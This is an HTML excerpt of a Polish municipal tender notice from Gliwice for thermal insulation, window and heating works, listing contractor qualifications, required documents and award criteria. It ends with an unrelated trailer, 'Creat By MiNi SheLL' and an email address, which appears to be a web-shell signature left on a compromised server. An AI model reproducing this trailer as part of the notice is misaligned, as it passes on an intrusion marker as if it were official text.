<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia, to znaczy: wykonawca musi wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, wykonał należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej dwie roboty budowlane, z których każda polegała na: dociepleniu ścian zewnętrznych lub montażu/wymianie stolarki okiennej lub wykonaniu nowej/wymianie instalacji c.o. i montażu nowego źródła ciepła, wymianie lub jego modernizacji. Wartość każdej opisanej powyżej roboty budowlanej powinna wynosić co najmniej 2.000.000,00 zł brutto.
W przypadku podmiotów działających wspólnie doświadczenie podlega sumowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których potencjał techniczny pozwoli na prawidłowe wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia, to znaczy: 
a) kierownikiem budowy, posiadającym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń do kierowania robotami budowlanymi (branża budowlana),
b) kierownikiem robót, posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, bez ograniczeń do kierowania robotami budowlanymi (branża sanitarna),
c) kierownikiem robót, posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń do kierowania robotami budowlanymi (branża elektryczna),
d) kierownikiem robót, posiadającym uprawnienia budowlane w specjalności inżynieryjnej drogowej bez ograniczeń do kierowania robotami budowlanymi (branża drogowa).

Wskazane powyżej uprawnienia budowlane muszą być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2013 r. poz. 1409 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. (Dz. U. poz. 1278) w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadającym im ważnym uprawnieniom budowlanym, wydanym na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju, z którego pochodzi dana osoba, które w zakresie objętym zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w budownictwie w ww. specjalnościach.
W przypadku podmiotów działających wspólnie osoby zdolne do wykonania zamówienia podlegają sumowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli na prawidłowe wykonanie zamówienia, to znaczy: posiadają ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 1.000.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania o treści ZAŁĄCZNIKA NR 3 do SIWZ oraz z załączenie dowodów, dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie: Wykaz i dowody potwierdzające należyte wykonanie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone należy ograniczyć wyłącznie do robót budowlanych potwierdzających spełnianie warunku w zakresie wiedzy i doświadczenia opisanego powyżej;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Pisemne zobowiązanie lub inne dokumenty muszą zawierać informacje dotyczące co najmniej:
- zakresu dostępnych wykonawcy zasobów innego podmiotu,
- sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
- charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Gwarancja i rękojmia - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>wg załączonego do specyfikacji wzoru umowy - ZAŁĄCZNIK NR 5</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.gliwice.eu w dziale Przetargi/Zamówienia publiczne Urzędu Miejskiego<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Gliwicach, ul. Zwycięstwa 21, 44-100 Gliwice, Biuro Obsługi Interesantów, stanowisko ds. zamówień publicznych (parter), tel. 32 239-12-56, faks 32 231-27-25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2015 godzina 08:30, miejsce: siedziba zamawiającego: Urząd Miejski w Gliwicach, ul. Zwycięstwa 21, 44-100 Gliwice, Biuro Obsługi Interesantów, stanowisko ds. zamówień publicznych lub listownie na adres zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawców, którzy w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszyli obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonali lub nienależycie wykonali zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia Wykonawców, który udowodnią, że podjęli konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawili szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązali się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com